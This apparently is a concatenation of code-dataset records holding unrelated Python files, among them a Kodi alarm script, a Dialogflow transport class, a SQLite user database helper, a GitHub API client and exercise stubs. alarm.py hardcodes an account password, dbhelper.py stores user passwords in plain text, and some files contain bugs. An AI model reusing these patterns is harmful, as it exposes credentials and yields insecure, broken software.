# HTMD adaptive sampling doesn't work very well with pdb files, so for now we'll generate a .coor file to use.
# load the coor file into htmd, if it exists and store as a pdb file.
from htmd.ui import *
htmd_mol = Molecule(pdb_out)
htmd_mol.write('{}/input.coor'.format(output_path)) | [
"mikeoconnor0308@gmail.com"
] | mikeoconnor0308@gmail.com |
04ffc83362365411680d47c2fd4221c7a4424d62 | 3d325da9ac51d1b47cc06e3aec5fdad0aaccd248 | /alarm.py | a75dbbfe4e2327a526314b3dae0818156b260ca5 | [] | no_license | bkanuka/kodi_alarm | 4613d7a840d8c9ab23faed59a9f799796dd2f772 | 47842c4d8f10d04c2cbd280f322bc69c03a70937 | refs/heads/master | 2016-09-06T13:13:37.140130 | 2015-08-30T18:02:22 | 2015-08-30T18:02:22 | 39,732,998 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 563 | py | import sys
import time
from harmony_control import Harmony
from kodi_control import Kodi
from amp_control import Amp
EMAIL='bkanuka@gmail.com'
PASSWORD='lookout'
HARMONY_IP='HarmonyHub'
HARMONY_PORT=5222
KODI_IP='kodi.home.bkanuka.com'
KODI_PORT=8080
print 'init'
harmony=Harmony(HARMONY_IP, HARMONY_PORT, EMAIL, PASSWORD)
amp = Amp(HARMONY_IP, HARMONY_PORT, EMAIL, PASSWORD)
kodi = Kodi(KODI_IP, KODI_PORT)
print 'starting kodi'
harmony.start_kodi(wait=True)
print 'setting volume'
amp.set_vol(60)
print 'playing'
kodi.play(playlist='Nikta', shuffle=True)
| [
"bkanuka@gmail.com"
] | bkanuka@gmail.com |
6895432cdb44dcd345003bed6d3af69f1745cbce | 2c7f99ff86d1786d133df13a630d62e7dcc63fab | /google/cloud/dialogflow_v2/services/conversation_profiles/transports/base.py | 5768948c216410b18bbda0988ae8fa09340f5c83 | [
"Apache-2.0"
] | permissive | rlindao/python-dialogflow | 2141b7181506210c6cfffb27bb9599ad21261c28 | 8958e562bb159b00bb1fc0fa97e5ffd35dea058d | refs/heads/master | 2023-04-06T15:09:14.888871 | 2021-04-16T21:34:24 | 2021-04-16T21:34:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,312 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import abc
import typing
import pkg_resources
from google import auth # type: ignore
from google.api_core import exceptions # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google.api_core import retry as retries # type: ignore
from google.auth import credentials # type: ignore
from google.cloud.dialogflow_v2.types import conversation_profile
from google.cloud.dialogflow_v2.types import (
conversation_profile as gcd_conversation_profile,
)
from google.protobuf import empty_pb2 as empty # type: ignore
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-dialogflow",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
class ConversationProfilesTransport(abc.ABC):
"""Abstract transport class for ConversationProfiles."""
AUTH_SCOPES = (
"https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/dialogflow",
)
def __init__(
self,
*,
host: str = "dialogflow.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: typing.Optional[str] = None,
scopes: typing.Optional[typing.Sequence[str]] = AUTH_SCOPES,
quota_project_id: typing.Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
**kwargs,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scope (Optional[Sequence[str]]): A list of scopes.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
"""
# Save the hostname. Default to port 443 (HTTPS) if none is specified.
if ":" not in host:
host += ":443"
self._host = host
# Save the scopes.
self._scopes = scopes or self.AUTH_SCOPES
# If no credentials are provided, then determine the appropriate
# defaults.
if credentials and credentials_file:
raise exceptions.DuplicateCredentialArgs(
"'credentials_file' and 'credentials' are mutually exclusive"
)
if credentials_file is not None:
credentials, _ = auth.load_credentials_from_file(
credentials_file, scopes=self._scopes, quota_project_id=quota_project_id
)
elif credentials is None:
credentials, _ = auth.default(
scopes=self._scopes, quota_project_id=quota_project_id
)
# Save the credentials.
self._credentials = credentials
def _prep_wrapped_messages(self, client_info):
# Precompute the wrapped methods.
self._wrapped_methods = {
self.list_conversation_profiles: gapic_v1.method.wrap_method(
self.list_conversation_profiles,
default_timeout=None,
client_info=client_info,
),
self.get_conversation_profile: gapic_v1.method.wrap_method(
self.get_conversation_profile,
default_timeout=None,
client_info=client_info,
),
self.create_conversation_profile: gapic_v1.method.wrap_method(
self.create_conversation_profile,
default_timeout=None,
client_info=client_info,
),
self.update_conversation_profile: gapic_v1.method.wrap_method(
self.update_conversation_profile,
default_timeout=None,
client_info=client_info,
),
self.delete_conversation_profile: gapic_v1.method.wrap_method(
self.delete_conversation_profile,
default_timeout=None,
client_info=client_info,
),
}
@property
def list_conversation_profiles(
self,
) -> typing.Callable[
[conversation_profile.ListConversationProfilesRequest],
typing.Union[
conversation_profile.ListConversationProfilesResponse,
typing.Awaitable[conversation_profile.ListConversationProfilesResponse],
],
]:
raise NotImplementedError()
@property
def get_conversation_profile(
self,
) -> typing.Callable[
[conversation_profile.GetConversationProfileRequest],
typing.Union[
conversation_profile.ConversationProfile,
typing.Awaitable[conversation_profile.ConversationProfile],
],
]:
raise NotImplementedError()
@property
def create_conversation_profile(
self,
) -> typing.Callable[
[gcd_conversation_profile.CreateConversationProfileRequest],
typing.Union[
gcd_conversation_profile.ConversationProfile,
typing.Awaitable[gcd_conversation_profile.ConversationProfile],
],
]:
raise NotImplementedError()
@property
def update_conversation_profile(
self,
) -> typing.Callable[
[gcd_conversation_profile.UpdateConversationProfileRequest],
typing.Union[
gcd_conversation_profile.ConversationProfile,
typing.Awaitable[gcd_conversation_profile.ConversationProfile],
],
]:
raise NotImplementedError()
@property
def delete_conversation_profile(
self,
) -> typing.Callable[
[conversation_profile.DeleteConversationProfileRequest],
typing.Union[empty.Empty, typing.Awaitable[empty.Empty]],
]:
raise NotImplementedError()
__all__ = ("ConversationProfilesTransport",)
| [
"noreply@github.com"
] | rlindao.noreply@github.com |
01504108aee0443c04b0634dcab1846110c965b7 | 32d32081f03ec813faed9559300d633761cd275c | /dbhelper.py | b0e54dc865e9473f76938b9bba860cc0c8f703cb | [] | no_license | jjsalomon/internship-sample-code | 5bb7c7358c01bb387c0e5f300f6bb7c32d49d62d | 766f8e1f99cfb0f5ad0ebab360442da22e6d4a52 | refs/heads/master | 2021-01-19T19:39:55.452384 | 2017-08-23T16:01:38 | 2017-08-23T16:01:38 | 101,199,283 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,771 | py | # -*- coding: utf-8 -*-
import sqlite3
class DatabaseHelper():
# This class is a singleton instance
__instance = None
@staticmethod
def getInstance():
if DatabaseHelper.__instance == None:
DatabaseHelper()
return DatabaseHelper.__instance
'''Constructor'''
def __init__(self):
if DatabaseHelper.__instance != None:
print("Returning Database Helper Instance")
else:
DatabaseHelper.__instance = self
print('[BOOTING]: Database Helper Module')
self.create_tables()
# Method to allow for easy connections to the database
def connect_db(self):
try:
conn = sqlite3.connect('database.db',timeout = 10)
print('[SUCCESS]: Connected to the Database')
return conn
except Exception as e:
print("[FAIL]: Could not connect to the Database")
raise e
def create_tables(self):
try:
conn = self.connect_db()
cursor = conn.cursor()
cursor.execute('''
CREATE TABLE IF NOT EXISTS users(ID INTEGER PRIMARY KEY AUTOINCREMENT,
username VARCHAR(20) NOT NULL UNIQUE,
password VARCHAR(20) NOT NULL,
sex VARCHAR(10) NOT NULL,
age int,
diagnosed int)
''')
cursor.execute('''
CREATE TABLE IF NOT EXISTS audio_recordings(ID INTEGER PRIMARY KEY AUTOINCREMENT,
accuracypercentage float NOT NULL,
pitch_variance float NOT NULL,
wordspermin float NOT NULL,
modal_frequency float NOT NULL,
breath_time float NOT NULL,
avg_amplitude float NOT NULL,
filename text NOT NULL,
userID int,
FOREIGN KEY (userID) REFERENCES users(ID)
)
''')
cursor.execute('''
CREATE TABLE IF NOT EXISTS prescreening(ID INTEGER PRIMARY KEY AUTOINCREMENT,
recordID int,
mood VARCHAR(10) NOT NULL,
medication VARCHAR(10) NOT NULL,
food VARCHAR(10),
FOREIGN KEY(recordID) REFERENCES users(ID)
)
''')
cursor.execute('''
CREATE TABLE IF NOT EXISTS config(ID INTEGER PRIMARY KEY AUTOINCREMENT,
recordID int,
time INTEGER NOT NULL,
ch_acc INTEGER NOT NULL,
ch_wpm INTEGER,
ch_freq INTEGER,
ch_mod_freq INTEGER,
ch_avg_amp INTEGER,
ch_breath INTEGER,
FOREIGN KEY(recordID) REFERENCES users(ID)
)
''')
cursor.execute('''
CREATE TABLE IF NOT EXISTS video_recordings(ID INTEGER PRIMARY KEY AUTOINCREMENT,
recordID int NOT NULL,
total_blinks int NOT NULL,
total_peaks int NOT NULL,
total_troughs int
blinkspermin float NOT NULL,
peakspermin float NOT NULL,
troughspermin float NOT NULL,
video_duration float NOT NULL,
FOREIGN KEY(recordID) REFERENCES users(ID))
''')
conn.commit()
print("[SUCCESS]: Created the tables")
except Exception as e:
print("[FAIL]: Could not create tables")
raise e
conn.rollback()
finally:
conn.close()
def insert_users(self,username,password,sex,age,diagnosed,case):
try:
conn = self.connect_db()
#conn = sqlite3.connect('database.db',timeout = 10)
cursor = conn.cursor()
cursor.execute('''
INSERT INTO users(username,password,sex,age,diagnosed) VALUES(?,?,?,?,?)
''', (username,password,sex,age,diagnosed))
print('[SUCCESS]: Inserted a user')
if(case == "Testing"):
conn.rollback()
return
else:
conn.commit()
except Exception as e:
print("[FAIL]: Failed to insert the user into DB")
raise e
conn.rollback()
finally:
conn.close()
def insert_audiorecordings(self,userId,accuracypercent,filename,wpm,pitch_var,mfreq,breath_time,avgAmp,case):
try:
conn = self.connect_db()
#conn = sqlite3.connect('database.db',timeout = 10)
# INSERT VALUES
cursor = conn.cursor()
cursor.execute('''
INSERT INTO audio_recordings(accuracypercentage,filename,pitch_variance,wordspermin,modal_frequency, breath_time, avg_amplitude,userID)
VALUES(?,?,?,?,?,?,?,?)''',(accuracypercent,filename,pitch_var,wpm,mfreq,breath_time,avgAmp,userId))
if(case == "Testing"):
conn.rollback()
return
else:
conn.commit()
except Exception as e:
print("[FAIL]: Failed to insert recordings into DB")
raise e
conn.rollback()
finally:
conn.close()
def insert_videorecordings(self,userId,blinks,peaks,troughs,blinkspermin,peakspermin,troughspermin,duration,case):
try:
conn = self.connect_db()
cursor = conn.cursor()
cursor.execute('''
INSERT INTO video_recordings(recordID,total_blinks,total_peaks,total_troughs,blinkspermin,
peakspermin,troughspermin,video_duration) VALUES(?,?,?,?,?,?,?,?)
''',(userId,blinks,peaks,troughs,blinkspermin,peakspermin,troughspermin,duration))
if(case == "Testing"):
conn.rollback()
return
else:
conn.commit()
except Exception as e:
print("[FAIL]: Failed to insert video recordings into DB")
raise e
conn.rollback()
finally:
conn.close()
def insert_prescreening(self, mood,medication,food,userId,case):
try:
conn = self.connect_db()
#conn = sqlite3.connect('database.db',timeout = 10)
cursor = conn.cursor()
cursor.execute('''
INSERT INTO prescreening(recordID,mood,medication,food)
VALUES(?,?,?,?)''',(userId,mood,medication,food))
print('[SUCCESS]: Inserted prescreening')
if(case == "Testing"):
conn.rollback()
return
else:
conn.commit()
except Exception as e:
print('[FAIL]: Failed to insert a text sample into the DB')
raise e
conn.rollback()
finally:
conn.close()
def insert_config(self,userId,time,ch_acc,ch_wpm,ch_freq,ch_mod_freq,ch_breath,ch_avg_amp,case):
try:
conn = self.connect_db()
#conn = sqlite3.connect('database.db',timeout = 10)
cursor = conn.cursor()
cursor.execute('''
INSERT INTO config(recordID,time,ch_acc,ch_wpm,ch_freq,ch_mod_freq,ch_breath,ch_avg_amp)
VALUES(?,?,?,?,?,?,?,?)''',(userId,time,ch_acc,ch_wpm,ch_freq,ch_mod_freq,ch_breath,ch_avg_amp))
print('[SUCCESS]: Inserted config')
if(case == "Testing"):
conn.rollback()
return
else:
conn.commit()
except Exception as e:
print('[FAIL]: Failed to insert a text sample into the DB')
raise e
conn.rollback()
finally:
conn.close()
# SELECT function to return values
# Placeholder for now
# But it works
def return_data(self):
conn = self.connect_deb()
#conn = sqlite3.connect('database.db')
cursor = conn.cursor()
selectcur = cursor.execute('''
SELECT * FROM users''')
for row in selectcur:
print('{0} : {1}, {2}'.format(row[0],row[1],row[2]))
def checkUserCredentials(self,function,username,password):
try:
data = []
conn = self.connect_db()
#conn = sqlite3.connect('database.db')
cursor = conn.cursor()
selectcur = cursor.execute('''
SELECT ID,username FROM users WHERE username = ? AND password = ?''',
(username,password))
row = selectcur.fetchone()
# If from Login function
if(function == 'Login'):
# Check if user exists
if row is None:
return "Invalid"
else:
for member in row:
data.append(member)
# Check if the form username is the same as the Database
if(username == data[1]):
# Return the user ID at user table
return data[0]
else:
return 'Invalid'
# Else if from Register function
elif(function == 'Register'):
if row is None:
return "Valid"
else:
# User already exists in the Database
return "Invalid"
except Exception as e:
print('[FAIL]: Failed to perform check function - DB error')
raise e
conn.rollback()
finally:
conn.close()
def return_audiorecordings(self,userId):
try:
conn = self.connect_db()
#conn = sqlite3.connect('database.db')
cursor = conn.cursor()
selectcur = cursor.execute('''
SELECT accuracypercentage, filename, pitch_variance,wordspermin,modal_frequency, breath_time, avg_amplitude FROM audio_recordings
WHERE userID = ?
''',(userId,))
# This took me ages.....
row = selectcur.fetchall()
acc = []
fn = []
pitch_var = []
wpm = []
mFreq = []
brTime = []
avgAmp = []
for i in row:
acc.append(i[0])
fn.append(i[1])
pitch_var.append(i[2])
wpm.append(i[3])
mFreq.append(i[4])
brTime.append(i[5])
avgAmp.append(i[6])
return acc, fn, wpm, pitch_var,mFreq,brTime,avgAmp
except Exception as e:
print('[FAIL]: Failed to return audio recordings- DB error')
raise e
conn.rollback()
finally:
conn.close()
def return_config(self,userID):
try:
conn = self.connect_db()
cursor = conn.cursor()
selectcur = cursor.execute('''
SELECT ch_acc, ch_wpm, ch_freq, ch_mod_freq,ch_breath,ch_avg_amp FROM config
WHERE recordID = ?
''',(userID,))
row = selectcur.fetchall()
acc = []
pitch_var = []
wpm = []
mFreq = []
brTime = []
avgAmp = []
for i in row:
acc.append(i[0])
pitch_var.append(i[1])
wpm.append(i[2])
mFreq.append(i[3])
brTime.append(i[4])
avgAmp.append(i[5])
try:
return acc,pitch_var,wpm,mFreq,brTime,avgAmp
except IndexError:
return None,None,None,None,None,None
except Exception as e:
print('[FAIL]: Failed to return config settings- DB error')
raise e
conn.rollback()
finally:
conn.close()
| [
"jsalomo1@ms.ds.uhc.com"
] | jsalomo1@ms.ds.uhc.com |
0b9347644b1ad62f3f1deb8668c660a135c70885 | e89509b453632747077bc57dbec265a7703d5c7c | /list/listappend.py | a2ddb719341f157c2047747bdda0aa142f51df03 | [] | no_license | Madhav2108/udemy-python-as | a9dcfdbfdc1bb85471aa66de77957e962a7c5486 | 0bc6a501516618fb3c7ab10be6bc16c047aeec3f | refs/heads/master | 2023-03-30T11:25:16.064592 | 2021-03-30T18:10:46 | 2021-03-30T18:10:46 | 286,001,815 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 572 | py | List = []
print(List)
List.append(1)
List.append(2)
List.append(4)
print(List)
for i in range(1, 4):
List.append(i)
print(List)
List.append((5, 6))
print(List)
List2 = ['For', 'Geeks']
List.append(List2)
print(List)
List.insert(3, 12)
List.insert(0, 'Geeks')
print(List)
List.extend([8, 'Geeks', 'Always'])
print(List)
List.remove(8)
List.remove(12)
print(List)
List.pop()
print(List)
List.pop(2)
print(List)
Sliced_List = List[::-1]
print("\nPrinting List in reverse: ")
print(Sliced_List)
list.sort()
print(list)
| [
"noreply@github.com"
] | Madhav2108.noreply@github.com |
4b0ce440690b330210af5adef191674bf778c002 | 352d34bd1288b3484f134edddec261ff106c67be | /data_handling_scripts/climex_time_series_length.py | 11a0edbecaf3d37d37520fdcda6378f9cadab2e0 | [
"MIT"
] | permissive | thanosargiriou/climex | 01b44bbdec2261642129393114522272d6d157fe | 73971c56f9afb054ed088843995e9e48e694d8ea | refs/heads/master | 2023-07-01T04:58:09.770410 | 2021-08-03T18:04:12 | 2021-08-03T18:04:12 | 304,844,470 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | """
Reads the daily_data_allstations_20210319.csv file and finds the time - series length for each station and parameter
Thanos Argiriou, 2921-07-11, LAPUP
"""
import pandas as pd
params = ['TN', 'TG', 'TX', 'DTR', 'RR'] # Meteorological parameters to be processed
# params = ['TN']
# Reads the datafile
df = pd.read_csv("daily_data_allstations_20210319.csv", na_values='NA', parse_dates=True, index_col=1)
stations = df['Station'].unique() # Extracts the station codes
# stations = [16606]
df_2bchecked = pd.DataFrame()
df_output = pd.DataFrame(columns=['Station', 'Parameter', 'Start', 'End'])
for wmo_code in stations:
df_station = df.loc[df['Station'] == wmo_code] # Extracts the data of a single station
for parameter in params:
df_2bchecked = df_station[parameter].dropna()
print(f"Station: {wmo_code}, Parameter: {parameter}, Start date: {df_2bchecked.index.min()}, "
f"End date: {df_2bchecked.index.max()}")
s2 = pd.Series([wmo_code, parameter, df_2bchecked.index.min(), df_2bchecked.index.max()],
index=['Station', 'Parameter', 'Start', 'End'])
df_output = df_output.append(s2, ignore_index=True)
df_output.sort_values(by=['Parameter', 'Start']).to_csv('time_series_length.csv', index=False)
| [
"athanarg@gmail.com"
] | athanarg@gmail.com |
1ac4822dd02e34f946f4183122d8a6b5ec804d02 | ba949e02c0f4a7ea0395a80bdc31ed3e5f5fcd54 | /problems/greedy/Solution678.py | f37f62721d5aa37063dd666a0d011a7ac22e9daa | [
"MIT"
] | permissive | akaliutau/cs-problems-python | 6bc0a74064f6e9687fe58b13763da1fdf2e1f626 | 9b1bd8e3932be62135a38a77f955ded9a766b654 | refs/heads/master | 2023-05-11T22:19:06.711001 | 2021-06-04T11:14:42 | 2021-06-04T11:14:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,937 | py | """ Given a string containing only three types of characters: '(', ')' and '*',
write a function to check whether trightBoundarys string is valid. We define
the validity of a string by these rules:
Any left parenthesis '(' must have a corresponding right parenthesis ')'. Any
right parenthesis ')' must have a corresponding left parenthesis '('. Left
parenthesis '(' must go before the corresponding right parenthesis ')'. '*'
could be treated as a single right parenthesis ')' or a single left
parenthesis '(' or an empty string. An empty string is also valid.
Example 1: Input: "()" Output: True
( * ) )
l 1 0 -1 -2
t 1 2 1 0
When checking whether the string is valid, we only cared about the "balance":
the number of extra, open left brackets as we parsed through the string. For
example, when checking whether '(()())' is valid, we had a balance of 1, 2,
1, 2, 1, 0 as we parse through the string: '(' has 1 left bracket, '((' has
2, '(()' has 1, and so on. This means that after parsing the first i symbols,
(which may include asterisks,) we only need to keep track of what the balance
could be.
For example, if we have string '(***)', then as we parse each symbol, the set
of possible values for the balance is
[1] for '(';
[0, 1, 2] for '(*';
[0, 1, 2, 3] for '(**';
[0, 1, 2, 3, 4] for '(***', and
[0, 1, 2, 3] for '(***)'.
Furthermore, we can prove these states always form a contiguous interval.
Thus, we only need to know the left and right bounds of this interval. That
is, we would keep those intermediate states described above as [lo, hi] = [1,
1], [0, 2], [0, 3], [0, 4], [0, 3].
Algorithm
Let lo, hi respectively be the smallest and largest possible number of open
left brackets after processing the current character in the string.
"""
class Solution678:
pass
| [
"aliaksei.kaliutau@gmail.com"
] | aliaksei.kaliutau@gmail.com |
3971c8ab3be504b2d034eba31fa56669b8617dd8 | 97146f81bb9f80371ef261998eb5ba51230ad636 | /portfolio/models.py | 65cd11c88ac65a4482f0b50bad31e54cf3cb65a1 | [] | no_license | camiloGmz/my-first-blog | 69cfd985b73d8e72d9ace94d650fc1e66efb9f74 | e297b00ea13eb463285fa78adf65e8230e29a60d | refs/heads/master | 2020-05-31T04:18:44.897823 | 2019-06-20T02:30:41 | 2019-06-20T02:30:41 | 190,096,350 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | from django.db import models
# Create your models here.
class Project(models.Model):
title = models.CharField(max_length=200, verbose_name='Titulo')
description = models.TextField(verbose_name='Descripción')
image = models.ImageField(verbose_name='Imagen', upload_to="projects")
created = models.DateTimeField(auto_now_add=True, verbose_name='Fecha de creación')
update = models.DateTimeField(auto_now=True, verbose_name='Fecha de edición')
class Meta:
verbose_name='Proyecto'
verbose_name_plural='Proyectos'
ordering=["-created"]
def __str__(self):
return self.title
| [
"camilo07@utp.edu.co"
] | camilo07@utp.edu.co |
b18f2725fed0c7d7320443034e222fa535f61df9 | a889ab9b402424b0cfdf5f14da62bd4e747270a2 | /GithubApi.py | 3d94ba6e5a0cf715d48c9d2e73ee35d9e701cbb0 | [] | no_license | prerana-agale/Github_Integration | cea00a0334ad02ee8fbbc635bc54dce512f819e0 | 89b380938817c58c6d2c64bf73f4cd73907d4cce | refs/heads/master | 2023-01-10T01:54:16.287728 | 2020-11-11T06:16:23 | 2020-11-11T06:16:23 | 308,229,893 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,149 | py | import requests
from pprint import pprint
from secret import Token_Value
API_URL = "https://api.github.com"
GITHUB_TOKEN = Token_Value
headers = {
"Authorization": "token " + GITHUB_TOKEN,
"Accept": "application/vnd.github.inertia-preview+json"
}
user_details = requests.get(API_URL + "/user", headers=headers)
get_repos = requests.get(API_URL + "/user/repos", headers=headers)
create_repo = requests.post(API_URL + "/user/repos", data='{"name":"PreranaAgale"}', headers=headers)
get_projects = requests.get(API_URL + "/users/preranaagale/projects", headers=headers)
#delete_repo = requests.delete(API_URL + "/repos/preranaagale/PreranaAgale123", headers=headers)
update_repo = requests.patch(API_URL + "/repos/prerana-agale/Testing_1", data='{"name":"New Demo"}', headers=headers)
create_project = requests.post(API_URL + "/user/projects", data='{"name":"Prerana"}', headers=headers)
update_project = requests.patch(API_URL + "/projects/5768902", data='{"name":"Testing"}', headers=headers)
proj_in_repo = requests.post(API_URL+"/repos/prerana-agale/Testing/projects", data='{"name":"New Demo"}', headers=headers)
print(
"\n1.Get user details\n2.Get repos\n3.create Repo\n4.Update Rpo\n5.Delete Repo\n6.Get projects\n7.Create "
"project\n8.Update project\n9. Create Project In Repo")
while True:
num = int(input("\n\nEnter your choice (or 0 to quit):"))
if num == 0:
break
elif num == 1:
pprint(user_details.json())
elif num == 2:
pprint(get_repos.json())
elif num == 3:
pprint(create_repo.json())
elif num == 4:
pprint(update_repo.json())
elif num == 5:
try:
response = requests.delete(API_URL + "/repos/preranaagale/New-Demo12344", headers=headers)
except:
print("Cannot delete repo!!")
else:
print(response.text)
elif num == 6:
pprint(get_projects.json())
elif num == 7:
pprint(create_project.json())
elif num == 8:
pprint(update_project.json())
elif num == 9:
pprint(proj_in_repo.json())
else:
print("enter correct option:")
| [
"Prerana.Agale@blueconchtech.com"
] | Prerana.Agale@blueconchtech.com |
7cf3f299b8843e75852a43bf7620ada06c806026 | 1439bf1f4127331306aa9abc2153170073b3f171 | /src/catalog/views.py | 0f27b4f3e01f844e3af061d98ad5a077a0a158e3 | [
"MIT"
] | permissive | xgerinx/skillsitev2 | 6c6ac7bfdfc19dea46ea8a57498a12d1a9120a1b | 860d1c1214de125346c0accc4ec4b8953297231b | refs/heads/master | 2023-08-25T05:57:04.704007 | 2021-10-26T09:41:20 | 2021-10-26T09:41:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,712 | py | from rest_framework.generics import RetrieveAPIView, ListAPIView, get_object_or_404
from rest_framework import status
from rest_framework.response import Response
from rest_framework.permissions import AllowAny
from rest_framework_simplejwt.authentication import JWTAuthentication
from rest_framework.viewsets import GenericViewSet
from rest_framework.mixins import RetrieveModelMixin
from .models import Module, Course, Categorie, Lesson
from .serializers import (ModuleInfoSerializer, CourseInfoSerializer, CategorySerializer, LessonSerializer)
from skill.utils import get_country
class URetrieveAPIView(RetrieveAPIView):
"""
RetrieveAPIView with modified serializer context that includes User object
"""
def get_user(self):
"""Return user object if request contains valid credentials"""
jwt_auth = JWTAuthentication()
user_token = jwt_auth.authenticate(self.request)
if user_token is not None:
user = user_token[0]
return user
else:
return None
def get_serializer_context(self):
"""Add user object and current user's country to serializer context"""
country = get_country(self.request)
context = super().get_serializer_context()
context['country'] = country
context['user'] = self.get_user()
context['mnemo'] = self.kwargs['mnemo']
return context
class ModuleDetailViewSet(URetrieveAPIView, RetrieveModelMixin, GenericViewSet):
queryset = Module.objects.all()
serializer_class = ModuleInfoSerializer
permission_classes = (AllowAny,)
lookup_field = 'mnemo'
class CourseInfoViewSet(URetrieveAPIView, RetrieveModelMixin, GenericViewSet):
queryset = Course.objects.all()
serializer_class = CourseInfoSerializer
permission_classes = (AllowAny,)
lookup_field = 'mnemo'
class CategoriesListAPIView(ListAPIView):
queryset = Categorie.objects.all()
serializer_class = CategorySerializer
permission_classes = (AllowAny,)
class ModuleLessonsViewSet(URetrieveAPIView, RetrieveModelMixin, GenericViewSet):
"""
Return all Lessons related to Module and check user for payment.
"""
queryset = Lesson.objects.all()
serializer_class = LessonSerializer
def get_queryset(self):
return super().get_queryset().filter(section__module=get_object_or_404(Module, mnemo=self.kwargs['module_mnemo']))
def retrieve(self, request, *args, **kwargs):
if self.request.user.profile.purchased_modules.filter(mnemo=self.kwargs['module_mnemo']):
return super().retrieve(request, *args, **kwargs)
else:
return Response(status=status.HTTP_402_PAYMENT_REQUIRED)
| [
"xi.forwork.ix@gmail.com"
] | xi.forwork.ix@gmail.com |
9ea9323c06957ea63a4699fe72b9431a47cd9117 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /leetcode/problems/313.super-ugly-number.py | 704a9e40a9a97991c2693e51d1623cb6c3511bc7 | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py | #
# @lc app=leetcode id=313 lang=python3
#
# [313] Super Ugly Number
#
# https://leetcode.com/problems/super-ugly-number/description/
#
# algorithms
# Medium (43.02%)
# Total Accepted: 67.2K
# Total Submissions: 156.3K
# Testcase Example: '12\n[2,7,13,19]'
#
# Write a program to find the n^th super ugly number.
#
# Super ugly numbers are positive numbers whose all prime factors are in the
# given prime list primes of size k.
#
# Example:
#
#
# Input: n = 12, primes = [2,7,13,19]
# Output: 32
# Explanation: [1,2,4,7,8,13,14,16,19,26,28,32] is the sequence of the first
# 12
# super ugly numbers given primes = [2,7,13,19] of size 4.
#
# Note:
#
#
# 1 is a super ugly number for any given primes.
# The given numbers in primes are in ascending order.
# 0 < k ≤ 100, 0 < n ≤ 10^6, 0 < primes[i] < 1000.
# The n^th super ugly number is guaranteed to fit in a 32-bit signed integer.
#
#
#
class Solution:
def nthSuperUglyNumber(self, n: int, primes: List[int]) -> int:
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
de49b4fb64c81096e931547635d5aad4087c37b0 | ba9267a02d30f00ede218c238408d3a0833e9b90 | /9.chapter/09_12_pr.py | 736768e808e78a8cf153bef9e3d9c88632fc2b6d | [] | no_license | Niraj-Suryavanshi/Python-Basic-Program | dae6a89eb25fda8a8780e97b8e291c24db5ddbeb | 7e01210a547b9e0c78bd747abd9ae8ccc519dd37 | refs/heads/main | 2023-08-11T05:59:06.770332 | 2021-09-14T18:58:24 | 2021-09-14T18:58:24 | 406,478,365 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 100 | py | with open("this.txt")as f:
content=f.read()
with open("copy.txt","w")as f:
f.write(content) | [
"nirajsuryavanshi561@gmail.com"
] | nirajsuryavanshi561@gmail.com |
6c87426b542d1abe69697bbadc042bbe7343942b | ee4ecc3c526322dc42c2d2bcf6a9982694da5d69 | /other/clrs/14/03/07.test.py | b349eec398176b98a6e752fb0837a12aba2c2153 | [] | no_license | skanev/playground | 77d0f35a7e932021c9da8ce4f9095be9ac8a5c1e | 07b88d789391e34d71a74722b0b42b328b1f3c62 | refs/heads/master | 2023-04-15T14:07:42.719874 | 2022-12-20T09:12:00 | 2022-12-20T09:12:16 | 191,557 | 212 | 108 | null | 2023-04-12T05:33:25 | 2009-05-03T16:41:17 | Scheme | UTF-8 | Python | false | false | 1,698 | py | import unittest
import random
from os import path
filename = path.join(path.dirname(__file__), '07.py')
exec(open(filename).read())
def overlapper(rectangles):
for i in range(0, len(rectangles) - 1):
one, *others = rectangles[i:]
for other in others:
if other.overlaps(one):
return one
return None
class OverlapingRectanglesTest(unittest.TestCase):
def test_simple_cases(self):
self.assertFalse(
overlap([
Rectangle(left=0, right=10, top=0, bottom=10),
Rectangle(left=20, right=30, top=0, bottom=10),
])
)
self.assertTrue(
overlap([
Rectangle(left=0, right=10, top=0, bottom=10),
